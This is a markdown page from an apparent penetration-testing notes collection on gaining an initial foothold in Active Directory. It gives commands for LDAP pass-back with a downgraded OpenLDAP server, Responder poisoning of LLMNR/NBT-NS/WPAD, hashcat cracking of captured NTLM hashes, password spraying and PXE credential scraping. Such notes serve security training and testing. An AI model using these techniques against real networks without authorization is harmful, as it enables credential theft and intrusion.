killchain-compendium/Miscellaneous/Active Directory/gaining_foothold_AD.md

3.6 KiB

Active Directory - Gain Foothold

  • Methods of aquiring the first set of credentials

Aquire credentials

OSINT

  • Discover info about the target via

Phishing

  • Gain credentials via eMail

NTLM Authenticated Services

  • Windows Authentication on NetNTLM is a Challenge-Response protocol used to deliver a challenge and the result on behalf of a user -- through the application -- to the DC

  • These may be exposed to the Internet. For example

    • Mail exchange, OWA webmail
    • RDP
    • VPN endpoints
    • Web applications using something like SSO via AD
  • Use these applications to either brute force / spraying passwords to found IDs or to verify previously aquired IDs and their passwords

LDAP Bind Credentials

  • LDAP may be integrated into an AD Forest. An application may verify an LDAP account with the help of AD credentials at the DC.
  • Third party programs may use LDAP like
    • CUPS
    • VPNs
    • gitlab

LDAP Pass-Back

  • After gaining access to a device's config including LDAP parameters, reroute its IP to your own IP. This may be done via web UIs.
  • Use an LDAP server to catch the credentials. Only PLAIN and LOGIN authentication must be allowed in order to gain the credentials.
    • OpenLDAP
dpkg-reconfigure -p low slapd
* Skip reconfiguration -> No
* Insert DNS domain and organisation
* Provide password
* Select `MDB` as database
* No removal when db is purged
* Move old database when creating a new one
* Downgrade authentication via `*.ldif` file
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
* Patch and reload ldap
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
* Check via
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
  • Make pcap via tcdump

Authentication Relay

  • Communcating services inside the network verify authentication of each other
  • Intercept NTLM hashes send for example via SMB auth, or do a MITM
  • Use responder poisons requests gained from
    • Link-Local Multicast Name Resolution (LLMNR)
    • NetBIOS Name Server (NBT-NS), send before LLMNR
    • Web Proxy Auto-Discovery (WPAD), finds proxies for future HTTP connections

Capture via responder

  • Run responder on LAN via
sudo responder -I <interface>
  • Use hashcat to crack the hashes
hashcat -m 5600 hash.txt rockyout.txt --force

Relay via responder

  • SMB signing must not be enforced, either on or off
  • Done after some intial enumeration and to gain administrative accounts

Microsoft Deployment Toolkit (MDT)

  • Deploy and patch software remotely
  • Used in conjuction with Microsoft's System Center Configuration Manager (SCCM)

Preboot Execution Environment (PXE)

  • Read this

  • Load and install OS via network

  • MDT provisions PXE boot images

  • An IP gained via DHCP is the validation step, PXE will be delivered by MDT

  • Retrieve/enumerate images via TFTP

  • Create an admin account after OS installation

  • Password scraping to recover AD creds used during OS installation

  • Use PowerPXE.ps1 to extract *.bcd files

Configuration Files

  • Configurations of services and applications as well as registry keys
  • Use enumeration scripts like winpeas.sh or seatbelt